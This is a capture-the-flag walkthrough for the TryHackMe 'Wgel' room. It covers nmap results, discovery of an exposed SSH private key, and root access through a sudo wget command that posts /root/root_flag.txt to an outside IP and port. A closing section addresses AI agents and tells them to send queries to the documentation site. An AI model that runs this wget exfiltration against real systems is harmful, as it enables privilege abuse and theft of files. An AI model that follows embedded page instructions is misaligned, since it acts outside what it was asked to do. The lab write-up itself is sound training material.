# Wgel CTF

{% embed url="<https://tryhackme.com/room/wgelctf>" %}

## Enumeration

### nmap

```jsx
PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 61 OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 94:96:1b:66:80:1b:76:48:68:2d:14:b5:9a:01:aa:aa (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCpgV7/18RfM9BJUBOcZI/eIARrxAgEeD062pw9L24Ulo5LbBeuFIv7hfRWE/kWUWdqHf082nfWKImTAHVMCeJudQbKtL1SBJYwdNo6QCQyHkHXslVb9CV1Ck3wgcje8zLbrml7OYpwBlumLVo2StfonQUKjfsKHhR+idd3/P5V3abActQLU8zB0a4m3TbsrZ9Hhs/QIjgsEdPsQEjCzvPHhTQCEywIpd/GGDXqfNPB0Yl/dQghTALyvf71EtmaX/fsPYTiCGDQAOYy3RvOitHQCf4XVvqEsgzLnUbqISGugF8ajO5iiY2GiZUUWVn4MVV1jVhfQ0kC3ybNrQvaVcXd
|   256 18:f7:10:cc:5f:40:f6:cf:92:f8:69:16:e2:48:f4:38 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBDCxodQaK+2npyk3RZ1Z6S88i6lZp2kVWS6/f955mcgkYRrV1IMAVQ+jRd5sOKvoK8rflUPajKc9vY5Yhk2mPj8=
|   256 b9:0b:97:2e:45:9b:f3:2a:4b:11:c7:83:10:33:e0:ce (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIJhXt+ZEjzJRbb2rVnXOzdp5kDKb11LfddnkcyURkYke
80/tcp open  http    syn-ack ttl 61 Apache httpd 2.4.18 ((Ubuntu))
| http-methods: 
|_  Supported Methods: POST OPTIONS GET HEAD
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
```

### Web page (port 80)

![image.png](/files/na9vUtI8KzYo0nTqbzk1)

Just a default page so we can do some directory search

#### Directory search

<figure><img src="/files/ib9QgI03CpwW456DmPd1" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/NsqSVYl55eavmrC5J7Kc" alt=""><figcaption></figcaption></figure>

We only got sitemap here and I did another directory search for the sub dir sitemap and we can see we have a `.ssh` dir which is huge

Now we have to know the username to get in with the private key (id\_rsa) we got

<figure><img src="/files/lq1kzYxaLHFwyJeX12x5" alt=""><figcaption></figcaption></figure>

### Obtaining username

What about the username? It’s in the source code of the main page and we got jessie

<figure><img src="/files/2TWOA29JgvwOgyhnOBcK" alt=""><figcaption></figcaption></figure>

### root

Here we can see the sudo list result and that's being `wget` is open to everyone

<figure><img src="/files/Iol4lAy7PTQKRRDLjLnl" alt=""><figcaption></figcaption></figure>

We can exploit this using the payload:

<pre class="language-jsx"><code class="lang-jsx"><strong>sudo /usr/bin/wget --post-file=/root/root_flag.txt &#x3C;ip>:&#x3C;port>
</strong></code></pre>

<figure><img src="/files/Zg8Inshyw7lIKIchzwgE" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://vix-w1zzer.gitbook.io/vixwizzer/walkthroughs/wgel-ctf.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.